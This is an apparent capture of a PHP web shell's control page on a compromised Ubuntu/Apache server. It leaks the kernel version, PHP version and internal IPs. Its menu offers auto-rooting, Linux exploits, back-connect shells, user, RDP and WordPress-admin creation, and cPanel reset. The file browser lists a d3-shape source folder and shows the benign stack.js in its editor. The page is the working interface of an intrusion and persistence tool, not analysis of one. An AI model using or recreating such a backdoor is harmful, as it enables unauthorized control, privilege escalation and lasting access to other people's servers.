Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
d3-shape /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
curve
[ DIR ]
drwxr-xr-x
offset
[ DIR ]
drwxr-xr-x
order
[ DIR ]
drwxr-xr-x
symbol
[ DIR ]
drwxr-xr-x
arc.js
8.64
KB
-rw-r--r--
area.js
3.14
KB
-rw-r--r--
areaRadial.js
944
B
-rw-r--r--
array.js
242
B
-rw-r--r--
constant.js
81
B
-rw-r--r--
descending.js
86
B
-rw-r--r--
identity.js
43
B
-rw-r--r--
index.js
3.28
KB
-rw-r--r--
line.js
1.69
KB
-rw-r--r--
lineRadial.js
402
B
-rw-r--r--
link.js
1.79
KB
-rw-r--r--
math.js
492
B
-rw-r--r--
noop.js
29
B
-rw-r--r--
path.js
393
B
-rw-r--r--
pie.js
2.34
KB
-rw-r--r--
point.js
81
B
-rw-r--r--
pointRadial.js
101
B
-rw-r--r--
stack.js
1.39
KB
-rw-r--r--
symbol.js
1.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stack.js
import array from "./array.js"; import constant from "./constant.js"; import offsetNone from "./offset/none.js"; import orderNone from "./order/none.js"; function stackValue(d, key) { return d[key]; } function stackSeries(key) { const series = []; series.key = key; return series; } export default function() { var keys = constant([]), order = orderNone, offset = offsetNone, value = stackValue; function stack(data) { var sz = Array.from(keys.apply(this, arguments), stackSeries), i, n = sz.length, j = -1, oz; for (const d of data) { for (i = 0, ++j; i < n; ++i) { (sz[i][j] = [0, +value(d, sz[i].key, j, data)]).data = d; } } for (i = 0, oz = array(order(sz)); i < n; ++i) { sz[oz[i]].index = i; } offset(sz, oz); return sz; } stack.keys = function(_) { return arguments.length ? (keys = typeof _ === "function" ? _ : constant(Array.from(_)), stack) : keys; }; stack.value = function(_) { return arguments.length ? (value = typeof _ === "function" ? _ : constant(+_), stack) : value; }; stack.order = function(_) { return arguments.length ? (order = _ == null ? orderNone : typeof _ === "function" ? _ : constant(Array.from(_)), stack) : order; }; stack.offset = function(_) { return arguments.length ? (offset = _ == null ? offsetNone : _, stack) : offset; }; return stack; }
Close